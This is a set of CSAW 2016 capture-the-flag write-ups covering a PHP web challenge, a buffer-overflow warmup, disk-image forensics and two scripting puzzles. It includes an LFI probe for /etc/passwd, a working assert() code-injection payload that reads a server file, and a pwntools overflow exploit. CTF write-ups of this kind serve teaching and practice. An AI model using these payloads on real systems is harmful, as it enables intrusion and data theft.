[CSAW 2016] mfw Writeup

Description:

Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/

Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.

The following table describes the possible respond pages:

URL	Result
http://web.chal.csaw.io:8000/?page=home	The “home” page is shown.
http://web.chal.csaw.io:8000/?page=about	The “about” page is shown.
http://web.chal.csaw.io:8000/?page=contact	The “contact” page is shown.
http://web.chal.csaw.io:8000/?page=Megabeets	Just a message saying: “That file doesn’t exist!”
http://web.chal.csaw.io:8000/?page=flag	An empty page is shown inside the website.
http://web.chal.csaw.io:8000/?page=../../../../etc/passwd	Just a message saying: “Detected hacking attempt!”

Looking at the source code i saw the following comment:

<!--<li ><a href="?page=flag">My secrets</a></li> -->

Ok, I need to get the “flag” page but any LFI technique I tried didn’t work. I thought about something else, In the “about” page the creator of the site mentioned that it was built using git. So let’s see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists so I downloaded the repository using DVCS-RIPPER.

You can find index.php here.

So the page is using assert() which is vulnerable to Command Injection attack. After a little trial and error I came up with the answer:

(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content

And received the flag:

string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!

If you try entering the url in a browser, look in the source of the page (CTRL+U), the flag is commented.

[CSAW 2016] PWN: Warmup Writeup

Description:

So you want to be a pwn-er huh? Well let’s throw you an easy one 😉
nc pwn.chal.csaw.io 8000

warmup

Let’s connect to the server and play with it a little bit:

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-
WOW:0x40060d
>Beet

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-
WOW:0x40060d
>Beetttttttttttttttttttttt

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-
WOW:0x40060d
>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

The program says “WOW:” followed by a memory address. This address is probably the address of the function we need to execute. Let’s open IDA to view the code:

int __cdecl main(int argc, const char **argv, const char **envp)
{
	  char s; // [sp+0h] [bp-80h]@1
	  char v5; // [sp+40h] [bp-40h]@1

	  write(1, "-Warm Up-\n", 0xAuLL);
	  write(1, "WOW:", 4uLL);
	  sprintf(&s, "%p\n", 4195853LL);
	  write(1, &s, 9uLL);
	  write(1, (const void *)'@\aU', 1uLL);
	  return gets(&v5, '>');
}b

This is a classic BOF (Buffer Overflow) case. The main method uses the gets() function to receive the given input and returns it. gets() is storing 64 characters (40h). Because there is no validation of the given string we need to supply an input that will exploit the program and make it jump to the wanted address: 0x40060d.

A short python script will do the job:

from pwn import *

r = remote('pwn.chal.csaw.io', 8000)
print r.recv()
r.sendline("A"*72 + "\x0D\x06\x40\x00\x00\x00\x00\x00")
print r.recvline()

And we got the flag: FLAG{LET_US_BEGIN_CSAW_2016}

[CSAW 2016] Clams Don’t Dance Writeup

Description:

Find the clam and open it to find the pearl.
out.img

We are given with a file. I ran file command on it to figure it’s file type:

[Megabeets] /tmp/CSAW/clam# file out.img
out.img: x86 boot sector

Ok, we have raw image file which will probably contain file/s with the flag. I’ll show 2 methods, choose your preferred one.

Method 1: Autopsy

Open Autopsy (my favorite forensics software, it’s free and heartily recommended) and choose the “Create New Case” on the Welcome window. You can also create a new case from the “File” menu.

autopsy_open

Fill the requested details and press “Finish”. Now add input data source to the case. Click “Case” > “Add Data Source…” or on the “Add Data Source” button ( ) on the main window and choose our file, out.img.

I cannot teach you about all the features of this great software so I’ll just show the path to the flag. If you’re not familiar with Autopsy I recommend you again to start working with it.

In the right panel you can find plenty of features, I will use only the directory viewer. Clicking on the data source (out.img) will show the files in the main directory of the image.

autopsy_view_dir

Do you see it? As it says in the description, we found the clam(.pptx)! The X on it’s icon means that this file was deleted from the operation system (but not from the disk). Double clicking it and you’ll see bunch of image files, one of them, called image0.gif, is looking like a MaxiCode. Is it?

clam_image0

Scan it either online or offline to reveal the flag. I was scanning it with this site.
flag{TH1NK ABOUT 1T B1LL. 1F U D13D, WOULD ANY1 CARE??}

Method 2: Foremost

This is less elegant way to solve the challenge. Run foremost on the file:

[Megabeets]$ foremost out.img

You’ll get a folder named output with zip file, movie file and pptx file. Extract the pptx file using 7-zip (PPTX is an archive file), go to the /ppt/media folder and you’ll find the MaxiCode image mentioned before.

[CSAW 2016] Regexpire Writeup

Description:

I thought I found a perfect match but she ended up being my regEx girlfriend.

nc misc.chal.csaw.io 8001

It wasn’t so hard, I asked google for the best way to generate matched string to a given pattern and wrote the following script. The only headache was when my generator used newlines (“\n”) so I removed them.

from pwn import *
import rstr
import exrex
from time import sleep
import re

# conect to server
r = remote('misc.chal.csaw.io', 8001)

# Print the question string
print r.recvline()

# Counter
i=1

while True:
	# Recieve the regex pattern
    reg = r.recvline()[:-1]
    print "%d -------\n"%i
    print reg
    print "-------\n"
    ans=rstr.xeger(reg).replace('\n','') # Remove newlines!
    # ans=exrex.getone(reg).replace('\n','')  # Another possible option
    r.sendline(ans)
    i+=1
	sleep(0.2)

And after 1000 tests we got the flag: flag{^regularly_express_yourself$}

[CSAW 2016] Coinslot Writeup

Description:

#Hope #Change #Obama2008

nc misc.chal.csaw.io 8000

Let’s connect to the server and see what will happen:

[Megabeets] /tmp/CSAW/Coinslot# nc misc.chal.csaw.io 8000
$0.07
$10,000 bills: 0
$5,000 bills: 0
$1,000 bills: 0
$500 bills: 0
$100 bills: 0
...
...

So, the server is displaying a wanted amount of money and we need to calculate the number of bills and coins given the amount. All we need is writing a simple python script and a coffee break because it will take about 10 minutes for the flag to come up 🙁

from pwn import *

r = remote('misc.chal.csaw.io',8000)

# Create an array of dollars and coins values
money = [10000.0, 5000.0, 1000.0, 500.0, 100.0, 50.0, 20.0, 10.0, 5.0, 1.0, 0.5, 0.25, 0.1, 0.05, 0.01]
count = 0

while(True):
	count += 1
	amount = 0.0
	
	# Recieve the wanted amount of money
	amount = float(r.recvline()[1:])
	print "Wanted amount is " + str(amount)

	# Send the number of dollars and coins for each value
	for m in money:
		print r.recv()
		ans = int(amount/m)
		print "Sending %d" %ans
		r.sendline(str(ans))
		amount = round((amount - (ans*m)), 2)
		print "Left with " + str(amount)
	print "[+] Finished %d" %count
	print r.recvline()

The flag is: flag{started-from-the-bottom-now-my-whole-team-fucking-here}